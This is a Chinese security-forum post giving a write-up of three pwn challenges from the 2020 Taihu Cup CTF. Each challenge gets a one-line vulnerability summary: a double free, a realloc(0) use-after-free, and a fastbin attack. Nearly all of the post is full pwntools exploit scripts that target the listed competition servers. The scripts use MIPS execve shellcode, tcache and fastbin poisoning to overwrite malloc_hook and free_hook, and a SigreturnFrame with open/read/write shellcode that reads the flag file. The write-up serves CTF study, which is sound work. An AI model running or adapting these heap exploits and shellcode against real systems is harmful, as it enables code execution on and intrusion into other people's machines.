2020太湖杯pwn题解

2020-11-7 19:35 6843

2020太湖杯pwn题解

Seclusion

2020-11-7 19:35

6843

2020太湖杯pwn题解

比赛刚刚结束，把wp放出来

pwn1

在stack布置fake chunk，然后利用double free劫持stack，覆盖返回地址执行shellcode

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':        
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    context(arch='mips', os='linux', endian='little', word_size=32)
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
    sl      = lambda data               :ctx.sendline(str(data)) 
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.remote = ('121.36.166.138', 8893)
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(idx,content='\n'):
        sla('ice\n',1)
        sla('\n',idx)
        sa('\n',content)
 
    def delete(idx):
        sla('ice\n',2)
        sla('n',idx)
 
    #def show(idx):
 
    def edit(content):
        sla('ice\n',3)
        sa('\n',content)
 
 
    rs('remote')
 
    shellcode = '\x69\x6e\x02\x3c\x2f\x62\x42\x34\0\0\xa2\xaf\x68\0\x02\x3c\x2f\x73\x42\x34\x04\0\xa2\xaf\0\0\xa4\x27\xab\x0f\x02\x24\0\0\x05\x24\0\0\x06\x24\x0c\0\0\0'
    system = 0x3fcb4 + 0xf66cd000
    bin_sh = 0x157d6c + 0xf66cd000
 
    sla('o!\n',shellcode)
    ru('0x')
    stack = int(r(8),16)
    #get canary
    edit('e'*0x21)
    canary=u32(ru("\n",drop=False)[-4:-1].rjust(4,"\x00"))
    #fake chunk
    edit(p32(0)*7+p32(0x41)+p32(canary))
    add(1,'\n')
    add(2,'\n')
    #double free
    delete(1)
    delete(2)
    delete(1)
    #modify the stack
    add(4,p32(stack+0x20))
    add(5,'\n')
    add(6,'\n')
    add(7,p32(canary)+p32(0)+p32(stack+0x34)+shellcode)
 
    sla('ice',4)
    irt()

pwn2

编辑功能时，realloc(0)后指针为清空，造成UAF

100

101

102

103

104

105

106

107

108

109

110

111

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':        
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
    sl      = lambda data               :ctx.sendline(str(data)) 
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    ctx.custom_lib_dir = '/home/iddm/glibc-all-in-one/libs/2.29-0ubuntu2_amd64'
    ctx.remote = ('119.3.89.93', 8015)
    #ctx.remote_libc = './libc.so'
    ctx.debug_remote_libc = True
 
    ctx.symbols = {
        'node':0x4040,
    }
 
    ctx.breakpoints = [0x17D6]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(idx,size,content='\n'):
        sla('ice',1)
        sla('index',idx)
        sla('size',size)
        sa('content',content)
 
    def delete(idx):
        sla('ice',3)
        sla('index',idx)
 
    def show(idx):
        sla('ice',4)
        sla('index',idx)
 
    def edit(idx,size,content='\n'):
        sla('ice',2)
        sla('index',idx)
        sla('size',size)
        if size != 0:
            sa('content',content)
 
 
    rs('remote')
 
 
    #dbg()
    add(0,0x10)
    add(2,0x10)
    add(3,0x10)
    delete(3)
    edit(0,0)
    #edit(1,0)
    #edit(0,0)
 
    show(0)
    #ru('content:')
 
    heap_base = uu64(ru('\n',drop=True)[-6:]) - 0x2c0
    lg('heap_base',heap_base)
 
    #dbg()
 
    for i in range(7):
        add(10+i,0x10)
    for i in range(7):
        delete(10+i)
    #dbg()
    edit(2,0)
    edit(2,0x10,p64(heap_base+0x250))
    add(4,0x10)
    add(5,0x10)
 
    sla('ice',666)
    ru('gift: ')
    libc_base = int(r(14),16) - 0x264140
    one = libc_base + 0x106ef8
    malloc_hook = libc_base+ 0x1e4c30
    sla('string: ','aaa')
 
    for i in range(8):
        add(20+i,0x5f)
    for i in range(7):
        delete(20+i)
    edit(27,0)
    edit(27,0x5f,p64(malloc_hook-0x23))
    dbg()
    add(30,0x5f)
    add(31,0x5f,'\0'*0x13+p64(one))
 
 
    irt()

pwn3

利用残留指针泄露libc heap地址
然后利用realloc造成uaf 从而构成double free
在chunk中布置fake_chunk利用fastbin atk指过去，从而造成堆块重叠能够任意地址读写
然后修改free_hook为setcontext+53进行ORW

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

#https://github.com/matrix1001/welpwn
from PwnContext import *
 
try:
    from IPython import embed as ipy
except ImportError:
    print ('IPython not installed.')
 
if __name__ == '__main__':        
    context.terminal = ['tmux', 'splitw', '-h']
    context.log_level = 'debug'
    # functions for quick script
    s       = lambda data               :ctx.send(str(data))        #in case that data is an int
    sa      = lambda delim,data         :ctx.sendafter(str(delim), str(data)) 
    sl      = lambda data               :ctx.sendline(str(data)) 
    sla     = lambda delim,data         :ctx.sendlineafter(str(delim), str(data)) 
    r       = lambda numb=4096          :ctx.recv(numb)
    ru      = lambda delims, drop=True  :ctx.recvuntil(delims, drop)
    irt     = lambda                    :ctx.interactive()
    rs      = lambda *args, **kwargs    :ctx.start(*args, **kwargs)
    dbg     = lambda gs='', **kwargs    :ctx.debug(gdbscript=gs, **kwargs)
    # misc functions
    uu32    = lambda data   :u32(data.ljust(4, '\0'))
    uu64    = lambda data   :u64(data.ljust(8, '\0'))
 
    ctx.binary = './pwn'
    ctx.remote = ('122.112.231.25', 8005)
 
 
    ctx.symbols = {
        'mark1':0x203060,
        'node':0x203080,
    }
 
    ctx.breakpoints = [0x1557]#menu
 
    def lg(s,addr):
        print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
 
    def add(number,length,info='\n',name='\n'):
        sla('>>>',1)
        sa('Name',name)
        sla('Number',number)
        sla('len',length)
        sa('Info',info)
    def delete(number):
        sla('>>>',3)
        sla('Number',number)
 
    def edit(number,choice,length,info='\n'):
        sla('>>>',2)
        sla('Number',number)
        sla('>',choice)
        sla('len',length)
        if length != 0:
            sa('info',info)
 
    def edit2(number,payload):
        sla('>>>',2)
        sla('Number',number)
        sla('>',1)
        sa('name',payload)
 
    def show(number):
        sla('>>>',4)
        sla('number',number)
 
    #rs()
    rs('remote')
 
    sa('String1:','\x04\x01\n')
    sa('String2:','\x01\x70\n')
 
    add(0,0x90)
    add(1,0x20)
    delete(0)
    add(0,0x90)
    show(0)
 
    libc_base = uu64(ru('\x7f',drop=False)[-6:]) - 0x3c4b0a - 0x100
    lg('libc_base',libc_base)
 
    #dbg()
    add(2,0x20)
    add(3,0x20)
    delete(3)
    delete(2)
    add(2,0x20)
    show(2)
    ru('Info:')
    heap_base = uu64(r(6))-0xa - 0x200
    lg('heap_base',heap_base)
    #dbg()
 
    payload = p64(0)+p64(0x71)+'\n'
 
    add(3,0x30,info=payload)
    add(4,0x50,info=p64(0x21)*10,name=p64(0x21)*2)
    #dbg()
    add(5,0x60)
    add(6,0x60)
    edit(5,2,0)
    delete(6)
    delete(5)
    #dbg()
    add(5,0x60,p64(heap_base+0x3a0)+'\n')
    add(6,0x60,'./flag\0','./flag\0')
    add(10,0x60)
    free_hook = 0x3c67a8+libc_base
    payload = p64(0)*6+p64(free_hook)+p64(4)+p64(heap_base+0x190)
    add(11,0x60,payload)
    edit2(4,p64(libc_base + 0x47b85))
    #dbg()
    frame = SigreturnFrame()
    frame.rax = 0
    frame.rdi = heap_base
    frame.rsi = 0x1000
    frame.rdx = 7
    frame.rip = libc_base + 0x101830
    frame.rsp = heap_base + 0x960
    payload = str(frame)
    add(13,0xf0,info=payload)
 
    context.arch = 'amd64'
    shellcode = ""
    shellcode += shellcraft.amd64.syscall("SYS_open",heap_base+0x6a0,'O_RDONLY', 0)
    shellcode += shellcraft.amd64.syscall("SYS_read",3,heap_base,0x40)
    shellcode += shellcraft.amd64.syscall("SYS_write",1,heap_base,0x40)
    shellcode = asm(shellcode)
    add(12,0x90,p64(heap_base+0x968)+shellcode)
 
    dbg()
    payload = p64(0)*5+p64(0x21)+p64(heap_base+0x800)+p64(4)+p64(heap_base)
    edit(11,2,0x68,info=payload)
    delete(4)
 
    irt()

[培训]二进制漏洞攻防（第3期）；满10人开班；模糊测试与工具使用二次开发；网络协议漏洞挖掘；Linux内核漏洞挖掘与利用；AOSP漏洞挖掘与利用；代码审计。

上传的附件：

2020_taihu.rar （8.06MB，28次下载）

收藏・1

点赞・2

打赏

最新回复 (2)
Zard_ 雪币： 481 活跃值： (2163) 能力值： ( LV2，RANK：15 ) 在线值：发帖 0 回帖 80 粉丝 5 关注私信	Zard_ 2020-11-11 09:15 2 楼 0 太给力了谢谢您的分享
t1an5g 雪币： 1120 活跃值： (342) 能力值： ( LV8，RANK：148 ) 在线值：发帖 2 回帖 10 粉丝 10 关注私信	t1an5g 2 2020-11-12 09:59 3 楼 0 国内的比赛终于知道开始玩realloc了
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复